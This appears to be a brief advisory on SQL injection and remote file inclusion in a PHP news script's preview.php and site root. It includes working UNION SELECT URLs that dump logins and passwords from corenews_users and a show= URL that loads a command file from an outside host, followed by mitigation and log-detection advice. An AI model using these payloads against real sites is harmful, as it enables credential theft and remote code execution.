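SQL injection in preview.php: the `userid` and `icon_id` parameters apparently reach a database query without validation ([SQL] marks the injection point):

http://www.example.com/preview.php?userid=[SQL]
http://www.example.com/preview.php?icon_id=[SQL]
http://www.example.com/preview.php?userid=[SQL]&icon_id=[SQL]

Examples that return the login and password columns of the corenews_users table:

http://www.example.com/preview.php?userid=-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*
http://www.example.com/preview.php?icon_id=-1/**/UNION/**/SELECT/**/0,password,login/**/FROM/**/corenews_users/*

File inclusion through the `show` parameter of the site root ([FILE] marks the included path; the second form shows that a remote URL is accepted):

http://www.example.com/?show=[FILE]
http://www.example.com/?show=http://myhost.com/cmd.txt?

Mitigation: bind `userid` and `icon_id` as integers in parameterized queries, resolve `show` against an allow-list of local files instead of using the supplied value as a path, and keep PHP's `allow_url_include` disabled. For detection, look in web server logs for `UNION`/`SELECT` keywords or `/**/` comment sequences in the preview.php query string, and for `show=` values that contain a URL scheme.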